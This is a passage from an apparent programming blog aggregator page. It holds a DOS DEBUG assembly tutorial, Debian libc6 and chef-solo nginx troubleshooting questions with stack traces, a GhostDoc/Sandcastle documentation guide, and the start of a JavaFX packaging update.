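        ("one Conditional Split (24 cases)", expected_evaluations(24)),                                # 12.5
        ("Derived Column + Conditional Split (1 + 24)", 1 + expected_evaluations(24)),                 # 13.5
        ("three Conditional Splits (2, 12, 12 cases)",
         expected_evaluations(2) + 2 * expected_evaluations(12)),                                      # 14.5, counted as in the post
    ]

    for name, per_row in scenarios:
        print("{0:45s} {1:4.1f} evaluations/row, {2:>13,.0f} in total".format(name, per_row, per_row * ROWS))

    # The catch, as explained above: the third dataflow's expressions each test a
    # single predicate (e.g. MONTH(BirthDate) == 1), so YearlyIncome <= 50000 is
    # evaluated once per row instead of roughly 12.5 times.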

    Read the article

  • The DOS DEBUG Environment

    - by MarkPearl
    Today I thought I would go back in time and have a look at the DEBUG command that has been available since the beginning of dawn in DOS, MS-DOS and Microsoft Windows. up to today I always knew it was there, but had no clue on how to use it so for those that are interested this might be a great geek party trick to pull out when you want the awe the younger generation and want to show them what “real” programming is about. But wait, you will have to do it relatively quickly as it seems like DEBUG was finally dumped from the Windows group in Windows 7. Not to worry, pull out that Windows XP box which will get you even more geek points and you can still poke DEBUG a bit. So, for those that are interested and want to find out a bit about the history of DEBUG read the wiki link here. That all put aside, lets get our hands dirty.. How to Start DEBUG in Windows Make sure your version of Windows supports DEBUG. Open up a console window Make a directory where you want to play with debug – in my instance I called it C221 Enter the directory and type Debug You will get a response with a – as illustrated in the image below…   The commands available in DEBUG There are several commands available in DEBUG. The most common ones are A (Assemble) R (Register) T (Trace) G (Go) D (Dump or Display) U (Unassemble) E (Enter) P (Proceed) N (Name) L (Load) W (Write) H (Hexadecimal) I (Input) O (Output) Q (Quit) I am not going to cover all these commands, but what I will do is go through a few of them briefly. A is for Assemble Command (to write code) The A command translates assembly language statements into machine code. It is quite useful for writing small assembly programs. Below I have written a very basic assembly program. The code typed out is as follows mov ax,0015 mov cx,0023 sub cx,ax mov [120],al mov cl,[120]A nop R is for Register (to jump to a point in memory) The r command turns out to be one of the most frequent commands you will use in DEBUG. It allows you to view the contents of registers and to change their values. It can be used with the following combinations… R – Displays the contents of all the registers R f – Displays the flags register R register_name – Displays the contents of a specific register All three methods are illustrated in the image above T is for Trace (To execute a program step by step) The t command allows us to execute the program step by step. Before we can trace the program we need to point back to the beginning of the program. We do this by typing in r ip, which moves us back to memory point 100. We then type trace which executes the first line of code (line 100) (As shown in the image below starting from the red arrow). You can see from the above image that the register AX now contains 0015 as per our instruction mov ax,0015 You can also see that the IP points to line 0103 which has the MOV CX,0023 command If we type t again it will now execute the second line of the program which moves 23 in the cx register. Again, we can see that the line of code was executed and that the CX register now holds the value of 23. What I would like to highlight now is the section underlined in red. These are the status flags. 
The ones we are going to look at now are 1st (NV), 4th (PL), 5th (NZ) & 8th (NC) NV means no overflow, the alternate would be OV PL means that the sign of the previous arithmetic operation was Plus, the alternate would be NG (Negative) NZ means that the results of the previous arithmetic operation operation was Not Zero, the alternate would be ZR NC means that No final Carry resulted from the previous arithmetic operation. CY means that there was a final Carry. We could now follow this process of entering the t command until the entire program is executed line by line. G is for Go (To execute a program up to a certain line number) So we have looked at executing a program line by line, which is fine if your program is minuscule BUT totally unpractical if we have any decent sized program. A quicker way to run some lines of code is to use the G command. The ‘g’ command executes a program up to a certain specified point. It can be used in connection with the the reset IP command. You would set your initial point and then run the G command with the line you want to end on. P is for Proceed (Similar to trace but slightly more streamlined) Another command similar to trace is the proceed command. All that the p command does is if it is called and it encounters a CALL, INT or LOOP command it terminates the program execution. In the example below I modified our example program to include an int 20 at the end of it as illustrated in the image below… Then when executing the code when I encountered the int 20 command I typed the P command and the program terminated normally (illustrated below). D is for Dump (or for those more polite Display) So, we have all these assembly lines of code, but if you have ever opened up an exe or com file in a text/hex editor, it looks nothing like assembly code. The D command is a way that we can see what our code looks like in memory (or in a hex editor). If we examined the image above, we can see that Debug is storing our assembly code with each instruction following immediately after the previous one. For instance in memory address 110 we have int and 111 we have 20. If we examine the dump of memory we can see at memory point 110 CD is stored and at memory point 111 20 is stored. U is for Unassemble (or Convert Machine code to Assembly Code) So up to now we have gone through a bunch of commands, but probably one of the most useful is the U command. Let’s say we don’t understand machine code so well and so instead we want to see it in its equivalent assembly code. We can type the U command followed by the start memory point, followed by the end memory point and it will show us the assembly code equivalent of the machine code. E is for a bunch of things… The E command can be used for a bunch of things… One example is to enter data or machine code instructions directly into memory. It can also be used to display the contents of memory locations. I am not going to worry to much about it in this post. N / L / W is for Name, Load & Write So we have written out assembly code in debug, and now we want to save it to disk, or write it as a com file or load it. This is where the N, L & W command come in handy. The n command is used to give a name to the executable program file and is pretty simple to use. The w command is a bit trickier. It saves to disk all the memory between point bx and point cx so you need to specify the bx memory address and the cx memory address for it to write your code. Let’s look at an example illustrated below. 
You do this by calling the r command followed by the either bx or cx. We can then go to the directory where we were working and will see the new file with the name we specified. The L command is relatively simple. You would first specify the name of the file you would like to load using the N command, and then call the L command. Q is for Quit The last command that I am going to write about in this post is the Q command. Simply put, calling the Q command exits DEBUG. Commands we did not Cover Out of the standard DEBUG commands we covered A, T, G, D, U, E, P, R, N, L & W. The ones we did not cover were H, I & O – I might make mention of these in a later post, but for the basics they are not really needed. Some Useful Resources Please note this post is based on the COS2213 handouts for UNISA A Guide to DEBUG - http://mirror.href.com/thestarman/asm/debug/debug.htm#NT
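As a cross-check on the trace walkthrough above, the arithmetic performed by the sample program is easy to replay outside of DEBUG. The values are the hex operands typed after the A command; nothing here is specific to DEBUG itself:

    # Replays the sample program: mov ax,0015 / mov cx,0023 / sub cx,ax /
    # mov [120],al.  All literals are hex, exactly as typed in DEBUG.
    ax = 0x0015                      # 21 decimal
    cx = 0x0023                      # 35 decimal
    cx = (cx - ax) & 0xFFFF          # 16-bit subtraction, as SUB CX,AX does

    print("CX after SUB = %04X (%d decimal)" % (cx, cx))     # 000E (14)
    al = ax & 0xFF                   # low byte of AX, stored at offset 120 by mov [120],al
    print("byte stored at [0120] = %02X" % al)                # 15

    # The result is non-zero, positive and needed no borrow, which is what the
    # NZ, PL and NC flags described in the trace section indicate after the SUB.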

    Read the article

  • Debian apt dependency mismatch (libc6)

    - by Sean Gordon
    Earlier, I tried to install package via apt-get (cython), but it failed with the Errors were encountered while processing: message, and since then, apt is refusing to install anything. apt-get check output below: root@dix:~# apt-get check Reading package lists... Done Building dependency tree Reading state information... Done You might want to run 'apt-get -f install' to correct these. The following packages have unmet dependencies: libc6 : Depends: libc-bin (= 2.11.3-2) but 2.11.3-4 is installed libc6-dev : Depends: libc6 (= 2.11.3-4) but 2.11.3-2 is installed libc6-i386 : Depends: libc6 (= 2.11.3-4) but 2.11.3-2 is installed E: Unmet dependencies. Try using -f. Apt/aptitude don't seem to be able to fix this dependency issue, and I don't know what to do. Edit: Running apt-get -f install results in no change, and my sources are all squeeze. Running apt-get update then apt-get dist-upgrade show no change either. Edit 2: I went back to try this again in a new terminal and apt-get -f install gives this error: dpkg: error processing /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb (--unpack): subprocess new pre-installation script killed by signal (Aborted) configured to not write apport reports Errors were encountered while processing: /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb E: Sub-process /usr/bin/dpkg returned an error code (1) Edit 3: Using apt-get clean first, then the previous commands, results in the first error again. Using apt-get -f dist-upgrade gives the below. Reading package lists... Building dependency tree... Reading state information... Correcting dependencies... Done The following packages will be upgraded: apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common at automake base-files bind9 bind9-doc bind9-host bind9utils debian-archive-keyring dnsutils dpkg-dev file host initscripts isc-dhcp-client isc-dhcp-common krb5-multidev libapr1 libbind9-60 libc6 libdns69 libdpkg-perl libexpat1 libexpat1-dev libgc1c2 libgssapi-krb5-2 libgssrpc4 libisc62 libisccc60 libisccfg62 libk5crypto3 libkadm5clnt-mit7 libkadm5srv-mit7 libkdb5-4 libkrb5-3 libkrb5-dev libkrb5support0 liblwres60 libmagic1 libmysqlclient16 libnss3-1d libssl-dev libssl0.9.8 libtiff4 libtiff4-dev libtiffxx0c2 libxi6 libxml2 linux-libc-dev lwresd mysql-client-5.1 mysql-common mysql-server mysql-server-5.1 mysql-server-core-5.1 openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib openssh-client openssh-server openssl procps python python-crypto python-minimal sudo sysv-rc sysvinit sysvinit-utils tzdata tzdata-java 75 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. 5 not fully installed or removed. Need to get 0 B/79.9 MB of archives. After this operation, 1,411 kB of additional disk space will be used. (Reading database ... 52241 files and directories currently installed.) Preparing to replace libc6 2.11.3-2 (using .../libc6_2.11.3-4_amd64.deb) ... 
*** stack smashing detected ***: /usr/bin/perl terminated ======= Backtrace: ========= /lib/libc.so.6(__fortify_fail+0x37)[0x7fdaad9b9f87] /lib/libc.so.6(__fortify_fail+0x0)[0x7fdaad9b9f50] /usr/lib/libperl.so.5.10(Perl_yylex+0x5896)[0x7fdaae343346] [0x8e83a0] ======= Memory map: ======== 00400000-00402000 r-xp 00000000 08:01 525338 /usr/bin/perl 00601000-00602000 rw-p 00001000 08:01 525338 /usr/bin/perl 00602000-0091f000 rw-p 00000000 00:00 0 [heap] 7fdaaca54000-7fdaaca6a000 r-xp 00000000 08:01 393818 /lib/libgcc_s.so.1 7fdaaca6a000-7fdaacc69000 ---p 00016000 08:01 393818 /lib/libgcc_s.so.1 7fdaacc69000-7fdaacc6a000 rw-p 00015000 08:01 393818 /lib/libgcc_s.so.1 7fdaacc6a000-7fdaacc6f000 r-xp 00000000 08:01 524949 /usr/lib/perl5/auto/Locale/gettext/gettext.so 7fdaacc6f000-7fdaace6e000 ---p 00005000 08:01 524949 /usr/lib/perl5/auto/Locale/gettext/gettext.so 7fdaace6e000-7fdaace6f000 rw-p 00004000 08:01 524949 /usr/lib/perl5/auto/Locale/gettext/gettext.so 7fdaace6f000-7fdaace79000 r-xp 00000000 08:01 532753 /usr/lib/perl/5.10.1/auto/Encode/Encode.so 7fdaace79000-7fdaad078000 ---p 0000a000 08:01 532753 /usr/lib/perl/5.10.1/auto/Encode/Encode.so 7fdaad078000-7fdaad079000 rw-p 00009000 08:01 532753 /usr/lib/perl/5.10.1/auto/Encode/Encode.so 7fdaad079000-7fdaad07e000 r-xp 00000000 08:01 525444 /usr/lib/perl/5.10.1/auto/IO/IO.so 7fdaad07e000-7fdaad27d000 ---p 00005000 08:01 525444 /usr/lib/perl/5.10.1/auto/IO/IO.so 7fdaad27d000-7fdaad27e000 rw-p 00004000 08:01 525444 /usr/lib/perl/5.10.1/auto/IO/IO.so 7fdaad27e000-7fdaad299000 r-xp 00000000 08:01 525450 /usr/lib/perl/5.10.1/auto/POSIX/POSIX.so 7fdaad299000-7fdaad498000 ---p 0001b000 08:01 525450 /usr/lib/perl/5.10.1/auto/POSIX/POSIX.so 7fdaad498000-7fdaad49b000 rw-p 0001a000 08:01 525450 /usr/lib/perl/5.10.1/auto/POSIX/POSIX.so 7fdaad49b000-7fdaad49e000 r-xp 00000000 08:01 525436 /usr/lib/perl/5.10.1/auto/Fcntl/Fcntl.so 7fdaad49e000-7fdaad69e000 ---p 00003000 08:01 525436 /usr/lib/perl/5.10.1/auto/Fcntl/Fcntl.so 7fdaad69e000-7fdaad69f000 rw-p 00003000 08:01 525436 /usr/lib/perl/5.10.1/auto/Fcntl/Fcntl.so 7fdaad69f000-7fdaad6a7000 r-xp 00000000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad6a7000-7fdaad8a6000 ---p 00008000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad8a6000-7fdaad8a7000 r--p 00007000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad8a7000-7fdaad8a8000 rw-p 00008000 08:01 393824 /lib/libcrypt-2.11.3.so 7fdaad8a8000-7fdaad8d6000 rw-p 00000000 00:00 0 7fdaad8d6000-7fdaada2f000 r-xp 00000000 08:01 393822 /lib/libc-2.11.3.so 7fdaada2f000-7fdaadc2e000 ---p 00159000 08:01 393822 /lib/libc-2.11.3.so 7fdaadc2e000-7fdaadc32000 r--p 00158000 08:01 393822 /lib/libc-2.11.3.so 7fdaadc32000-7fdaadc33000 rw-p 0015c000 08:01 393822 /lib/libc-2.11.3.so 7fdaadc33000-7fdaadc38000 rw-p 00000000 00:00 0 7fdaadc38000-7fdaadc4f000 r-xp 00000000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaadc4f000-7fdaade4e000 ---p 00017000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaade4e000-7fdaade4f000 r--p 00016000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaade4f000-7fdaade50000 rw-p 00017000 08:01 393248 /lib/libpthread-2.11.3.so 7fdaade50000-7fdaade54000 rw-p 00000000 00:00 0 7fdaade54000-7fdaaded4000 r-xp 00000000 08:01 393826 /lib/libm-2.11.3.so 7fdaaded4000-7fdaae0d4000 ---p 00080000 08:01 393826 /lib/libm-2.11.3.so 7fdaae0d4000-7fdaae0d5000 r--p 00080000 08:01 393826 /lib/libm-2.11.3.so 7fdaae0d5000-7fdaae0d6000 rw-p 00081000 08:01 393826 /lib/libm-2.11.3.so 7fdaae0d6000-7fdaae0d8000 r-xp 00000000 08:01 393825 /lib/libdl-2.11.3.so 7fdaae0d8000-7fdaae2d8000 ---p 00002000 
08:01 393825 /lib/libdl-2.11.3.so 7fdaae2d8000-7fdaae2d9000 r--p 00002000 08:01 393825 /lib/libdl-2.11.3.so 7fdaae2d9000-7fdaae2da000 rw-p 00003000 08:01 393825 /lib/libdl-2.11.3.so 7fdaae2da000-7fdaae43f000 r-xp 00000000 08:01 525387 /usr/lib/libperl.so.5.10.1 7fdaae43f000-7fdaae63e000 ---p 00165000 08:01 525387 /usr/lib/libperl.so.5.10.1 7fdaae63e000-7fdaae647000 rw-p 00164000 08:01 525387 /usr/lib/libperl.so.5.10.1 7fdaae647000-7fdaae665000 r-xp 00000000 08:01 393819 /lib/ld-2.11.3.so 7fdaae854000-7fdaae859000 rw-p 00000000 00:00 0 7fdaae862000-7fdaae864000 rw-p 00000000 00:00 0 7fdaae864000-7fdaae865000 r--p 0001d000 08:01 393819 /lib/ld-2.11.3.so 7fdaae865000-7fdaae866000 rw-p 0001e000 08:01 393819 /lib/ld-2.11.3.so 7fdaae866000-7fdaae867000 rw-p 00000000 00:00 0 7fff9616d000-7fff9618e000 rw-p 00000000 00:00 0 [stack] 7fff961ff000-7fff96200000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 r--p 00000000 00:00 0 [vsyscall] dpkg: error processing /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb (--unpack): subprocess new pre-installation script killed by signal (Aborted) Errors were encountered while processing: /var/cache/apt/archives/libc6_2.11.3-4_amd64.deb

    Read the article

  • Documenting C# Library using GhostDoc and SandCastle

    - by sreejukg
    Documentation is an essential part of any IT project, especially when you are creating reusable components that will be used by other developers (such as class libraries). Without documentation, re-using a class library is almost impossible. Just think of coding .NET applications without MSDN documentation (oops, I can't think of it). Normally developers, who know the bits and pieces of their classes, see it as boring work to write the details again just to generate documentation. The amount of work needed to create the documentation and keep it up to date with changes also makes manual creation of documentation tedious, if not impossible. So what is the effective solution? Let me divide this into two steps: 1. Generate comments for your code while you are writing the code. 2. Create the documentation file from these comments. Now I am going to examine these processes. Step 1: Generate XML Comments automatically Most developers write comments for their code. The best thing is that the comments are entered during the development process. Additionally, comments give a good reference to the code and make your code more manageable/readable. Later these comments can be converted into documentation, along with your source code, by identifying properties and methods. I found an add-in for Visual Studio, GhostDoc, that automatically generates XML documentation comments for C#. The add-in is available in the Visual Studio Gallery at MSDN. You can download it from the url http://visualstudiogallery.msdn.microsoft.com/en-us/46A20578-F0D5-4B1E-B55D-F001A6345748. I downloaded the free version from the above url; it suits my requirements. There is a professional version available (you need to pay some $ for this) that gives you some more features. The installation process is straightforward; a couple of clicks will do the work for you. The best thing with GhostDoc is that it supports multiple versions of Visual Studio, such as 2005, 2008 and 2010. After installing GhostDoc, when you start Visual Studio, the GhostDoc configuration dialog will appear. The first screen asks you to assign a hot key; pressing this hot key will enter the comment into your code file with the structure required by GhostDoc. Click Assign to go to the next step, where you configure the rules for generating the documentation from the code file. Click Create to start creating the rules. Click the Finish button to close this wizard. You have now performed the configuration required by GhostDoc. In the Visual Studio Tools menu you will find a GhostDoc entry that gives you some options. Now let us examine how GhostDoc generates comments for a method. I have written the below code in my code-behind file. public Char GetChar(string str, int pos) { return str[pos]; } Now I need to generate the comments for this function. Select the function and enter the hot key assigned during the configuration. GhostDoc will generate the comments as follows. /// <summary> /// Gets the char. /// </summary> /// <param name="str">The STR.</param> /// <param name="pos">The pos.</param> /// <returns></returns> public Char GetChar(string str, int pos) { return str[pos]; } So this is a very handy tool that helps developers write comments easily. You can generate the XML documentation file separately while compiling the project; this is done by the C# compiler. You can enable the XML documentation creation option (checkbox) under Project properties -> Build tab.
Now when you compile, the XML file will be created under the bin folder. Step 2: Generate the documentation from the XML file Now you have generated the XML documentation file. Sandcastle is the tool from Microsoft that generates MSDN-style documentation from the compiler-produced XML file. The project is available in CodePlex http://sandcastle.codeplex.com/. Download and install Sandcastle on your computer. Sandcastle is a command-line tool that doesn't have a rich GUI; if you want to automate the documentation generation, you will definitely be using the command-line tools. Since I want to generate the documentation from the XML file produced in the previous step, I was expecting a GUI where I can see the options. There is a GUI available for Sandcastle called Sandcastle Help File Builder. See the link to the project in CodePlex: http://www.codeplex.com/wikipage?ProjectName=SHFB. You need to install Sandcastle and then the Sandcastle Help File Builder. From here I assume that you have installed both Sandcastle and Sandcastle Help File Builder successfully. Once you have installed the Help File Builder, it will be available in your All Programs list. Clicking on the Sandcastle Help File Builder GUI will launch the application. First you need to create a project. Click on File -> New Project. The New Project dialog will appear. Choose a folder to store your project file and give a name for your documentation project. Click the Save button. Now you will see your project properties. From the Project Explorer, right-click on Documentation Sources and click on the Add Documentation Source link. A documentation source is a file such as an assembly or a Visual Studio solution or project from which information will be extracted to produce API documentation. From the Add Documentation Source dialog, I selected the XML file generated by my project. Once you add the XML file to the project, you will see the dll file automatically added by the Help File Builder. Now click on the Build button and the application will generate the help file. The Build window gives you the result of each step. Once the process has completed successfully, you will have the following output in the build window. Now navigate to your help project (I selected the folder My Documents\Documentation); inside the Help folder you can find the chm file. Opening the chm file will give you MSDN-like documentation. Documentation is an important part of the development life cycle. Sandcastle with GhostDoc makes this process easier, so that developers can implement documentation in their projects with simple-to-use steps.
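The auto-generated comments above are only a starting point; Sandcastle produces much richer help topics once you flesh the comments out by hand. The following is a small illustrative C# sketch (the class and members are invented for this example and are not from the original post) showing the kind of XML doc tags (summary, param, returns, exception, example) that surface nicely in the generated .chm file:

    using System;

    /// <summary>
    /// Provides small string helpers used by the documentation demo.
    /// </summary>
    public static class StringHelpers
    {
        /// <summary>
        /// Gets the character at the given position of a string.
        /// </summary>
        /// <param name="str">The string to read from. Must not be null.</param>
        /// <param name="pos">The zero-based position of the character.</param>
        /// <returns>The character found at <paramref name="pos"/>.</returns>
        /// <exception cref="ArgumentNullException">Thrown when <paramref name="str"/> is null.</exception>
        /// <exception cref="ArgumentOutOfRangeException">Thrown when <paramref name="pos"/> is outside the string.</exception>
        /// <example>
        /// <code>
        /// char c = StringHelpers.GetChar("hello", 1); // returns 'e'
        /// </code>
        /// </example>
        public static char GetChar(string str, int pos)
        {
            if (str == null) throw new ArgumentNullException("str");
            if (pos < 0 || pos >= str.Length) throw new ArgumentOutOfRangeException("pos");
            return str[pos];
        }
    }

The richer the hand-edited comments, the more useful the Sandcastle output, so it pays to refine what GhostDoc generates rather than shipping it verbatim.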

    Read the article

  • Chef-solo cannot locate an nginx recipe template

    - by crftr
    I have been recently experimenting with Chef. I thought I would attempt to rebuild my personal web server using chef-solo. It's an AWS instance running the Amazon 64bit Linux AMI. My first objective is to install nginx. I have cloned the Opscode cookbook repository, and am using their nginx cookbook. My problem appears to be that chef-solo cannot find a template after it has started the process. The command I'm using is chef-solo -j /etc/chef/dna.json dna.json { "nginx": { "user": "ec2-user" }, "recipes": [ "nginx" ] } solo.rb file_cache_path "/var/chef-solo" cookbook_path "/var/chef-solo/cookbooks" ...the output [root@ip-10-202-221-135 chef-solo]# chef-solo -j /etc/chef/dna.json /usr/lib64/ruby/gems/1.9.1/gems/systemu-2.2.0/lib/systemu.rb:29: Use RbConfig instead of obsolete and deprecated Config. [Fri, 27 Jan 2012 19:41:36 +0000] INFO: *** Chef 0.10.8 *** [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Setting the run_list to ["nginx"] from JSON [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List is [recipe[nginx]] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Run List expands to [nginx] [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Starting Chef Run for ip-10-202-221-135.ec2.internal [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Running start handlers [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Start handlers complete. [Fri, 27 Jan 2012 19:41:37 +0000] INFO: Missing gem 'mysql' [Fri, 27 Jan 2012 19:41:38 +0000] INFO: Processing package[nginx] action install (nginx::default line 21) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing directory[/var/log/nginx] action create (nginx::default line 23) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxensite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/usr/sbin/nxdissite] action create (nginx::default line 30) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[nginx.conf] action create (nginx::default line 38) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: Processing template[/etc/nginx/sites-available/default] action create (nginx::default line 46) [Fri, 27 Jan 2012 19:41:39 +0000] INFO: template[/etc/nginx/sites-available/default] mode changed to 644 [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (nginx::default line 46) has had an error [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: template[/etc/nginx/sites-available/default] (/var/chef-solo/cookbooks/nginx/recipes/default.rb:46:in `from_file') had an error: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `rename' /usr/lib64/ruby/1.9.1/fileutils.rb:519:in `block in mv' /usr/lib64/ruby/1.9.1/fileutils.rb:1515:in `block in fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:1531:in `fu_each_src_dest0' /usr/lib64/ruby/1.9.1/fileutils.rb:1513:in `fu_each_src_dest' /usr/lib64/ruby/1.9.1/fileutils.rb:508:in `mv' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:47:in `block in action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:48:in `block in render_template' /usr/lib64/ruby/1.9.1/tempfile.rb:316:in `open' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/mixin/template.rb:45:in `render_template' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:99:in `render_with_context' 
/usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/provider/template.rb:39:in `action_create' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource.rb:440:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:45:in `run_action' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block (2 levels) in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `each' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:81:in `block in converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:94:in `block in execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:116:in `call_iterator_block' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:85:in `step' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:104:in `iterate' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection/stepable_iterator.rb:55:in `each_with_index' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/resource_collection.rb:92:in `execute_each_resource' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/runner.rb:76:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:312:in `converge' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/client.rb:160:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:192:in `block in run_application' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `loop' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application/solo.rb:183:in `run_application' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/lib/chef/application.rb:67:in `run' /usr/lib64/ruby/gems/1.9.1/gems/chef-0.10.8/bin/chef-solo:25:in `<top (required)>' /usr/bin/chef-solo:19:in `load' /usr/bin/chef-solo:19:in `<main>' [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Running exception handlers [Fri, 27 Jan 2012 19:41:39 +0000] ERROR: Exception handlers complete [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Stacktrace dumped to /var/chef-solo/chef-stacktrace.out [Fri, 27 Jan 2012 19:41:39 +0000] FATAL: Errno::ENOENT: template[/etc/nginx/sites-available/default] (nginx::default line 46) had an error: Errno::ENOENT: No such file or directory - (/tmp/chef-rendered-template20120127-29441-1yp55vz, /etc/nginx/sites-available/default) What am I doing incorrectly?

    Read the article

  • 7u10: JavaFX packaging tools update

    - by igor
    The last few weeks have been very busy here at Oracle. JavaOne 2012 is next week. Come to see us there! Meanwhile I'd like to quickly update you on recent developments in the area of packaging tools. This is an area of ongoing development for the team, and we are continuing to refine and improve both the tools and the process. Thanks to everyone who shared experiences and suggestions with us. We are listening and have fixed many of the reported issues. Please keep them coming as comments on the blog or (even better) file issues directly in the JIRA. In this post I'll focus on several new packaging features added in JDK 7 update 10: Self-Contained Applications: Select Java Runtime to bundle Self-Contained Applications: Create Package without Java Runtime Self-Contained Applications: Package non-JavaFX application Option to disable proxy setup in the JavaFX launcher Ability to specify codebase for WebStart application Option to update existing jar file Self-Contained Applications: Specify application icon Self-Contained Applications: Pass parameters on the command line All these features and a number of other important bug fixes are available in the developer preview builds of JDK 7 update 10 (build 8 or later). Please give them a try and share your feedback! Self-Contained Applications: Select Java Runtime to bundle The packager tools in 7u6 assume the current JDK (based on the java.home property) is the source for the embedded runtime. This is a useful simplification for many scenarios, but there are cases where the ability to specify explicitly what to embed is handy. For example, the IDE may be using a fixed JDK to build the project, and this is not the version you want to bundle into your application. To make this more flexible, we now allow you to specify the location of the base JDK explicitly. It is optional, and if you do not specify it then the current JDK will be used (i.e. this change is fully backward compatible). A new 'basedir' attribute was added to the <fx:platform> tag. Its value is the location of the JDK to be used. It is OK to point to either the JRE inside the JDK or the JDK top-level folder. However, it must be a JDK and not a JRE, as we need other JDK tools for proper packaging, and it must be a recent version of the JDK that is bundled with JavaFX (i.e. Java 7 update 6 or later). Here are examples (<fx:platform> is part of the <fx:deploy> task): <fx:platform basedir="${java.home}"/> <fx:platform basedir="c:\tools\jdk7"/> Hint: this feature enables you to use the packaging tools from JDK 7 update 10 (and benefit from the bug fixes and other features described below) to create an application package with the bundled FCS version of JRE 7 update 6. Self-Contained Applications: Create Package without Java Runtime This may sound a bit puzzling at first glance. A package without an embedded Java Runtime is not really self-contained and obviously will not help with: Deployment on fresh systems. The JRE needs to be installed separately (and this step will require admin permissions). Possible compatibility issues due to updates of the system runtime. However, these packages are much, much smaller in size. If download size matters and you are confident that users have the recommended system JRE installed, then this may be a good option to consider if you want to improve the user experience for install and launch. Technically, this is implemented as an extension of the previous feature. Pass an empty string as the value for the 'basedir' attribute and this will be treated as a request not to bundle the Java runtime, e.g.
<fx:platform basedir=""/> Self-Contained Applications: Package non-JavaFX application One of popular questions people ask about self-contained applications - can i package my Java application as self-contained application? Absolutely. This is true even for tools shipped with JDK 7 update 6. Simply follow steps for creating package for Swing application with integrated JavaFX content and they will work even if your application does not use JavaFX. What's wrong with it? Well, there are few caveats: bundle size is larger because JavaFX is bundled whilst it is not really needed main application jar needs to be packaged to comply to JavaFX packaging requirements(and this may be not trivial to achieve in your existing build scripts) javafx application launcher may not work well with startup logic of your application (for example launcher will initialize networking stack and this may void custom networking settings in your application code) In JDK 7 update 6 <fx:deploy> was updated to accept arbitrary executable jar as an input. Self-contained application package will be created preserving input jar as-is, i.e. no JavaFX launcher will be embedded. This does not help with first point above but resolves other two. More formally following assertions must be true for packaging to succeed: application can be launched as "java -jar YourApp.jar" from the command line  mainClass attribute of <fx:application> refers to application main class <fx:resources> lists all resources needed for the application To give you an example lets assume we need to create a bundle for application consisting of 3 jars:     dist/javamain.jar     dist/lib/somelib.jar    dist/morelibs/anotherlib.jar where javamain.jar has manifest with      Main-Class: app.Main     Class-Path: lib/somelib.jar morelibs/anotherlib.jar Here is sample ant code to package it: <target 